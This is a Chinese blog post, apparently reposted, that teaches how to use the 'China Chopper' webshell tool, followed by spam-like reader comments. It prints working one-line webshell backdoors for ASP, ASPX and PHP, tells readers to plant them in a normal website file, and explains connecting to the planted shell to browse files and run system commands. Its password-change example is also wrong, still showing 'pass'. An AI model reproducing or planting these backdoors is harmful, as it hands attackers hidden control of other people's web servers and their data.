光的传人

一句话与中国菜刀的用法

 注:本文转载,仅用来个人学习。

菜刀是用来连一句话的,asp、aspx、php的一句话菜刀都可以连,只是这几种一句话语句不一样。
asp的一句话是:<%eval request(“pass”)%>
aspx的一句话是:<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
php的一句话是:<?php @eval($_POST['pass']);?>
这几个一句话的密码都是pass,也就是双引号或者单引号包含着的这部分,比如我想把asp的一句话的密码改成drvfan,那么改完之后就是这样的:
<%eval request(“pass”)%>
其他同理。
要想连一句话,你首先得把这个一句话插入到一个正常的网站文件中,asp的一句话插入到asp文件里,aspx的一句话插入到aspx文件里,php同理。
当然,你也可以把一句话单独写在一个文件里,比如你新建了一个asp.php文件,这个asp.php文件的全部内容就只有一个一句话,也是可以的。
插入了一句话木马,下面就是连接了。
在菜刀主界面,右击,选择“添加”,
在“地址”这里填上你插入一句话的文件的地址,后边的那个小框填的是你的一句话的密码,其他的可以不用填,
填完之后单击“添加”,就可以了。
添加完毕后,你的这个一句话的shell会显示到菜刀主界面里,鼠标右击它,选择“文件管理”,就可以看到网站上的文件了
所以,使用菜刀,一定要熟练运用一句话
asp的一句话是:<%eval request(“pass”)%>
aspx的一句话是:<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
php的一句话是:<?php @eval($_POST['pass']);?>
在菜刀工具里还有一个功能,是“虚拟终端”,也是在右键菜单里的,这个相当于webshell中的执行DOS命令的功能
如果你的shell有权执行DOS命令,那么直接输入命令回车就可以看到结果了

网友评论(以下内容仅代表网友观点,与本站无关)
    14.空气源  2013/4/7 14:53:31 回复
    php的不懂呀!路过支持一下呗
    13.健康使者  2012/12/20 9:53:56 回复
    学习了
    12.女装报告  2012/12/11 11:32:08 回复
    这是要教我们啥呀?
    11.智能电网  2012/12/6 11:23:01 回复
    鸭梨山大,楼主这篇藐似没看懂
    10.长安婚纱摄影  2012/11/30 12:35:06 回复
    鸭梨,太有才了!
    9.南阳金巴黎婚纱摄影  2012/11/24 21:52:10 回复
    好,顶
    8.奶茶  2012/11/22 16:21:13 回复
    菜刀不但是用来切菜还可以做其他很多东西。。。
    7.wordpress博客主机  2012/11/21 9:43:19 回复
    学习了
    6.霍致永博客  2012/11/20 15:44:43 回复
    这个标题太震撼啦哈哈欢迎来访
    5.快播电影  2012/11/20 10:59:24 回复
    看不懂 PHP了,吐血了
    4.李志红博客  2012/11/19 16:07:53 回复
    不是很懂,只来看看。
    3.男装  2012/11/19 15:34:39 回复
    看了半天,因为不懂,所以还是没有看懂
    2.比分直播  2012/11/16 16:40:27 回复
    来学习了,谢谢分享
    1.润初颜  2012/11/16 15:22:27 回复
    php的不懂呀!路过支持一下

原创文章请注明转载自光的传人博客本文地址:http://www.liu16.com/post/maicaidao.html,标题:一句话与中国菜刀的用法

【我来说两句】
分享到:

评论 14

发表评论:

阿光验证码

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。